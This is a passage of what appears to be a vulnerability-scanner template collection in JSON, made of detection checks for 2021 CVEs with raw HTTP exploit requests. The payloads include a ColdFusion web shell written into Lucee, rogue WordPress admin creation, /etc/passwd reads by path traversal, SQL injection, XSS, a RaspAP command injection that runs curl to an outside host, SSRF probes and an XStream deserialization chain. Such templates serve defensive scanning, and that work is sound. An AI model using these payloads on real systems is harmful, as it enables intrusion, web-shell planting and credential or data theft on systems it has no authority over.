Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/basic/?referer=https://interact.sh&_c=auth&ctz=120&signup_password=&_a%5bsignup%5d=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-21307","info":{"name":"Lucee Admin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=a\n","POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=\n<cfoutput>\n\n<table>\n<form method=\"POST\" action=\"\">\n<tr><td>Command:</td><td><input type=test name=\"cmd\" size=50\n<cfif isdefined(\"form.cmd\")>value=\"#form.cmd#\"</cfif>><br></td></tr>\n<tr><td>Options:</td><td> <input type=text name=\"opts\" size=50\n<cfif isdefined(\"form.opts\")>value=\"#form.opts#\"</cfif>><br></td></tr>\n<tr><td>Timeout:</td><td> <input type=text name=\"timeout\" size=4\n<cfif isdefined(\"form.timeout\")>value=\"#form.timeout#\"\n<cfelse> value=\"5\"</cfif>></td></tr>\n</table>\n<input type=submit value=\"Exec\" >\n</form>\n<cfif isdefined(\"form.cmd\")>\n<cfsavecontent variable=\"myVar\">\n<cfexecute name = \"#Form.cmd#\"\narguments = \"#Form.opts#\"\ntimeout = \"#Form.timeout#\">\n</cfexecute>\n</cfsavecontent>\n<pre>\n","POST /lucee/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\ncmd=id&opts=&timeout=5\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-46005","info":{"name":"Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nusername={{username}}&password={{password}}&login=\n","POST /admin/post-avehical.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicletitle\"\n\nTest\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"brandname\"\n\n1\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicalorcview\"\n\n</script><script>alert(document.domain)</script>\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"priceperday\"\n\n500\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"fueltype\"\n\nPetrol\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"modelyear\"\n\n2022\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"seatingcapacity\"\n\n5\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img1\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img2\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img3\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img4\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img5\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"submit\"\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv--\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40323","info":{"name":"Cobbler <3.3.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>find_profile</methodName>\n  <params>\n    <param>\n      <value>\n        <struct>\n          <member>\n            <name>name</name>\n            <value>\n              <string>*</string>\n            </value>\n          </member>\n        </struct>\n      </value>\n    </param>\n  </params>\n</methodCall>\n","POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>generate_script</methodName>\n  <params>\n    <param>\n      <value>\n        <string>{{profile}}</string>\n      </value>\n    </param>\n    <param>\n      <value>\n        <string></string>\n      </value>\n    </param>\n    <param>\n      <value>\n        <string>/etc/passwd</string>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/xml"]},{"type":"regex","regex":["root:.*:0","bin:.*:1","nobody:.*:99"],"condition":"or"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"profile","group":1,"regex":["<value><string>(.*?)</string></value>"],"internal":true}]}]},{"id":"CVE-2021-28149","info":{"name":"Hongdian H8922 3.0.5 Devices - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nCache-Control: max-age=0\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","sshd:[x*]","root:[$]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35323","info":{"name":"Bludit 3.13.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /bludit/admin/login HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 10s\nPOST /bludit/admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntokenCSRF={{tokenCSRF}}&username=admin%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&password=pass&save=\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<img src=x onerror=alert(document.domain)>\") && contains(body_2, \"Bludit\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"tokenCSRF","part":"body","group":1,"regex":["type=\"hidden\" id=\"jstokenCSRF\" name=\"tokenCSRF\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2021-27905","info":{"name":"Apache Solr <=8.8.1 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n"],"matchers":[{"type":"word","part":"body","words":["<str name=\"status\">OK</str>"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2021-37216","info":{"name":"QSAN Storage Manager <3.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http_header.php"],"headers":{"X-Trigger-XSS":"<script>alert(1)</script>"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(header), 'x-xss-protection')"]},{"type":"word","part":"body","words":["\"HTTP_X_TRIGGER_XSS\":\"<script>alert(1)</script>\""]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2021-34621","info":{"name":"WordPress ProfilePress  3.0.0-3.1.3 - Admin User Creation Weakness","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_username\"\n\n{{randstr}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_email\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password_present\"\n\ntrue\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_first_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_last_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"_wp_http_referer\"\n\n/wp/?page_id=18\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"pp_current_url\"\n\n{{BaseURL}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"wp_capabilities[administrator]\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_form_id\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_referrer_page\"\n\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"action\"\n\npp_ajax_signup\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"melange_id\"\n\n\n-----------------------------138742543134772812001999326589--\n","POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nlog={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome to your WordPress Dashboard"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42192","info":{"name":"KONGA 0.14.9 - Privilege Escalation","severity":"high"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"password\": \"{{password}}\", \"identifier\": \"{{username}}\"}\n","POST /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"token\": \"{{token}}\"}\n","PUT /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"admin\": \"true\", \"passports\": {\"password\": \"{{password}}\", \"protocol\": \"local\"}, \"token\": \"{{token}}\", \"password_confirmation\": \"{{password}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_2, \"\\\"admin\\\":false\")","contains(body_3, \"\\\"admin\\\":true\")"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\"id\":([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25899","info":{"name":"Void Aural Rec Monitor 9.0.0.1 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /AurallRECMonitor/services/svc-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nparam1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))dummy)--+dummy&param2=test\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Contacte con el administrador\")"],"condition":"and"}]}]},{"id":"CVE-2021-21287","info":{"name":"MinIO Browser API - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /minio/webrpc HTTP/1.1\nHost: {{interactsh-url}}\nContent-Type: application/json\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36\nContent-Length: 76\n\n{\"id\":1,\"jsonrpc\":\"2.0\",\"params\":{\"token\":  \"Test\"},\"method\":\"web.LoginSTS\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["We encountered an internal error"]}]}]},{"id":"CVE-2021-38751","info":{"name":"ExponentCMS <= 2.6 - Host Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Host":"{{randstr}}.tld"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{randstr}}.tld","EXPONENT.PATH","EXPONENT.URL"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25065","info":{"name":"Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert(document.domain)%3E&cff_final_response=true HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<img src onerror=alert(document.domain)>\")","contains(body_2, \"custom-facebook-feed\")"],"condition":"and"}]}]},{"id":"CVE-2021-25003","info":{"name":"WordPress WPCargo Track & Trace <6.9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n2={{md5(num)}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 != 200","status_code_2 == 200","status_code_3 == 200","contains(body_3, md5(num))","contains(body_3, 'PNG')"],"condition":"and"}]}]},{"id":"CVE-2021-24342","info":{"name":"WordPress JNews Theme <8.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/themes/jnews/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Change Log:","JNews -"],"condition":"and"}]},{"raw":["POST /?ajax-request=jnews HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nlang=en_US&cat_id=6\"></script><script>alert(document.domain)</script>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37305","info":{"name":"Jeecg Boot <= 2.4.5 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jeecg-boot/sys/user/querySysUser?username=admin"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username\":\"admin","success\":true","result\":{"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43574","info":{"name":"Atmail 6.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>\" does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500,403],"condition":"or"}]}]},{"id":"CVE-2021-40542","info":{"name":"Opensis-Classic 8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33357","info":{"name":"RaspAP <=2.6.5 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["DHCPEnabled"]}],"extractors":[{"type":"regex","group":1,"regex":["GET \\/([a-z-]+) HTTP"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-24285","info":{"name":"WordPress Car Seller - Auto Classifieds Script - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24288","info":{"name":"WordPress AcyMailing <7.5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-24275","info":{"name":"Popup by Supsystic <1.10.5 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25033","info":{"name":"Noptin < 1.6.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-26702","info":{"name":"EPrints 3.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24943","info":{"name":"Registrations for the Events Calendar < 2.7.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nevent_id=3 AND (SELECT 1874 FROM (SELECT(SLEEP(5)))vNpy)&email={{text}}@{{text}}.com\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(body, \"Please enter the email you registered with\")"],"condition":"and"}]}]},{"id":"CVE-2021-27850","info":{"name":"Apache Tapestry - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /assets/app/something/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/java"]},{"type":"word","part":"body","words":["configuration","webtools"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\\/assets\\/app\\/([a-z0-9]+)\\/services\\/AppMod"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-33904","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["\"k3woq\"^confirm(document.domain)^\"a2pbrnzx5a9\"","servProvCode"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45967","info":{"name":"Pascom CPS Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24210","info":{"name":"WordPress PhastPress <1.111 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-39141","info":{"name":"XStream 1.4.18  - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>\n        <owner/>\n        <managedObjectManagerClosed>false</managedObjectManagerClosed>\n        <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>\n          <stubHandlers>\n            <entry>\n              <method>\n                <class>java.lang.Comparable</class>\n                <name>compareTo</name>\n                <parameter-types>\n                  <class>java.lang.Object</class>\n                </parameter-types>\n              </method>\n              <com.sun.xml.internal.ws.client.sei.StubHandler>\n                <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>\n                  <indices>\n                    <int>0</int>\n                  </indices>\n                  <getters>\n                    <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>\n                  </getters>\n                  <accessors>\n                    <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\n                      <val_-isJAXBElement>false</val_-isJAXBElement>\n                      <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>\n                        <type>int</type>\n                        <field>\n                          <name>hash</name>\n                          <clazz>java.lang.String</clazz>\n                        </field>\n                      </val_-getter>\n                      <val_-isListType>false</val_-isListType>\n                      <val_-n>\n                        <namespaceURI/>\n                        <localPart>hash</localPart>\n                        <prefix/>\n                      </val_-n>\n                      <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>\n                        <type>java.lang.String</type>\n                        <method>\n                          <class>javax.naming.InitialContext</class>\n                          <name>doLookup</name>\n                          <parameter-types>\n                            <class>java.lang.String</class>\n                          </parameter-types>\n                        </method>\n                      </val_-setter>\n                      <outer-class>\n                        <propertySetters>\n                          <entry>\n                            <string>serialPersistentFields</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>[Ljava.io.ObjectStreamField;</type>\n                              <field>\n                                <name>serialPersistentFields</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>CASE_INSENSITIVE_ORDER</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>java.util.Comparator</type>\n                              <field>\n                                <name>CASE_INSENSITIVE_ORDER</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>serialVersionUID</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>long</type>\n                              <field>\n                                <name>serialVersionUID</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>value</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>[C</type>\n                              <field>\n                                <name>value</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>hash</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>int</type>\n                              <field reference='../../../../../val_-getter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                        </propertySetters>\n                        <propertyGetters>\n                          <entry>\n                            <string>serialPersistentFields</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>[Ljava.io.ObjectStreamField;</type>\n                              <field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>CASE_INSENSITIVE_ORDER</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>java.util.Comparator</type>\n                              <field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>serialVersionUID</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>long</type>\n                              <field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>value</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>[C</type>\n                              <field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>hash</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>\n                          </entry>\n                        </propertyGetters>\n                        <elementLocalNameCollision>false</elementLocalNameCollision>\n                        <contentClass>java.lang.String</contentClass>\n                        <elementDeclaredTypes/>\n                      </outer-class>\n                    </com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\n                  </accessors>\n                  <wrapper>java.lang.Object</wrapper>\n                  <bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>\n                  <dynamicWrapper>false</dynamicWrapper>\n                </bodyBuilder>\n                <isOneWay>false</isOneWay>\n              </com.sun.xml.internal.ws.client.sei.StubHandler>\n            </entry>\n          </stubHandlers>\n          <clientConfig>false</clientConfig>\n        </databinding>\n        <methodHandlers>\n          <entry>\n            <method 